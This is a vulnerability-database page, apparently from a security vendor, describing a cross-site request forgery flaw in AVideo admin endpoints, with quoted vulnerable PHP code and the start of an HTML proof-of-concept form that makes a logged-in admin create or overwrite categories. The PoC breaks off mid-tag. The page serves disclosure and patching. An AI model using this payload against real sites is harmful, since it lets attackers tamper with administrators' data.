🛡️ CVE-2026-40926 — avideo

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-352 NVD
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

WWBN AVideo has Multiple CSRF Vulnerabilities in Admin JSON Endpoints (Category CRUD, Plugin Update Script)

Summary

Three admin-only JSON endpoints — objects/categoryAddNew.json.php, objects/categoryDelete.json.php, and objects/pluginRunUpdateScript.json.php — enforce only a role check (Category::canCreateCategory() / User::isAdmin()) and perform state-changing actions against the database without calling isGlobalTokenValid() or forbidIfIsUntrustedRequest(). Peer endpoints in the same directory (pluginSwitch.json.php, pluginRunDatabaseScript.json.php) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin's updateScript() method in the admin's session.

Details

AVideo's CSRF defense is not applied globally — each endpoint must explicitly call isGlobalTokenValid() (defined in objects/functions.php:2313), which verifies $_REQUEST['globalToken']. A search across the codebase shows 18 files that correctly invoke forbidIfIsUntrustedRequest() or isGlobalTokenValid(), while the three endpoints below do not.

1. objects/categoryAddNew.json.php:18 — CSRF create/overwrite category

```php

18 if (!Category::canCreateCategory()) {

19 $obj->msg = __("Permission denied");

20 die(json_encode($obj));

21 }

22

23 $objCat = new Category(intval(@$_POST['id']));

24 $objCat->setName($_POST['name']);

25 $objCat->setClean_name($_POST['clean_name']);

26 $objCat->setDescription($_POST['description']);

27 $objCat->setIconClass($_POST['iconClass']);

28 $objCat->setSuggested($_POST['suggested']);

29 $objCat->setParentId($_POST['parentId']);

30 $objCat->setPrivate($_POST['private']);

31 $objCat->setAllow_download($_POST['allow_download']);

32 $objCat->setOrder($_POST['order']);

33 $obj->categories_id = $objCat->save();

```

Category::canCreateCategory() (objects/category.php:620-630) returns true for any admin. Because the row is loaded via new Category(intval(@$_POST['id'])), a non-zero id causes the existing row to be overwritten, not just created — the same primitive can mutate existing categories. No CSRF/Origin check precedes the write.

2. objects/categoryDelete.json.php:10 — CSRF delete category

```php

10 if (!Category::canCreateCategory()) {

11 die('{"error":"' . __("Permission denied") . '"}');

12 }

13 require_once 'category.php';

14 $obj = new Category($_POST['id']);

15 $response = $obj->delete();

```

No token check. An attacker can force an admin browser to POST any id, deleting rows from categories.

3. objects/pluginRunUpdateScript.json.php:9 — CSRF forced plugin update

```php

9 if (!User::isAdmin()) {

10 forbiddenPage('Permission denied');

11 }

12 if (empty($_POST['name'])) {

13 forbiddenPage('Name can\'t be blank');

14 }

15 ini_set('max_execution_time', 300);

16 require_once $global['systemRootPath'] . 'plugin/AVideoPlugin.php';

17

18 if($_POST['uuid'] == 'plist12345-370-4b1f-977a-fd0e5cabtube'){

19 $_POST['name'] = 'PlayLists';

20 }

21

22 $obj = new stdClass();

23 $obj->error = !AVideoPlugin::updatePlugin($_POST['name']);

```

AVideoPlugin::updatePlugin() (plugin/AVideoPlugin.php:1452) looks up the plugin by name and, if it defines an updateScript() method, invokes it and then records the new plugin version via Plugin::setCurrentVersionByUuid. No CSRF or Origin check precedes this. By contrast, the sibling endpoint objects/pluginRunDatabaseScript.json.php:16 does call isGlobalTokenValid(), and objects/pluginSwitch.json.php:12 also calls it — confirming this file is an omission.

Why no global mitigation blocks this

  • isGlobalTokenValid() is not invoked from objects/configuration.php or any other bootstrap; it must be called per-endpoint.
  • isUntrustedRequest() (objects/functionsSecurity.php:146) is only triggered via an explicit call to forbidIfIsUntrustedRequest(); none of the three endpoints call it.
  • The handlers use $_POST directly without any framework-level CSRF middleware (AVideo does not use one).
  • Category::canCreateCategory() is purely a role check and does not examine request origin or tokens.

PoC

All three require the victim to be a logged-in AVideo administrator who visits the attacker-hosted page. Cookies are sent automatically by the browser.

PoC 1 — Create/overwrite category

```html

<!-- evil-create.html -->

<html><body>

<form id=f action="https://victim.example.com/objects/categoryAddNew.json.php" method="POST">

<input name="id" value="0"> <!-- 0 = create; any existing id = overwrite -->

<input name="name" value="Owned">

<input name="clean_name" value="owned">

<input name="description" value="pwn">

<input name="iconClass" value="fas fa-skull">

<input name="suggested" value="1">

<input name="parentId" value="0">

<input na

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. A user must be tricked into taking some action. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity high, availability low.

Weakness class

CVE-2026-40926 is classified as CWE-352: Cross-Site Request Forgery (CSRF). A state-changing request is accepted without proof it was intended, so another site can trigger it using the victim's session.

Affected software

CVE-2026-40926 is recorded against 2 packages.

  • avideo (fixed in 29.0)
  • wwbn/avideo

Timeline and source

Published on 21 April 2026 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com
github.com
github.com

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L
CWE CWE-352
Public Exploit ⚠️ Yes
Source NVD
Published 2026-04-21
Updated 2026-08-12
Modified 2026-06-17

Affected Packages

Software From version Fixed in
avideo 29.0
wwbn/avideo

Similar Threats

Exploit Protection

Are you running avideo?

CVE-2026-40926 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-40926 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.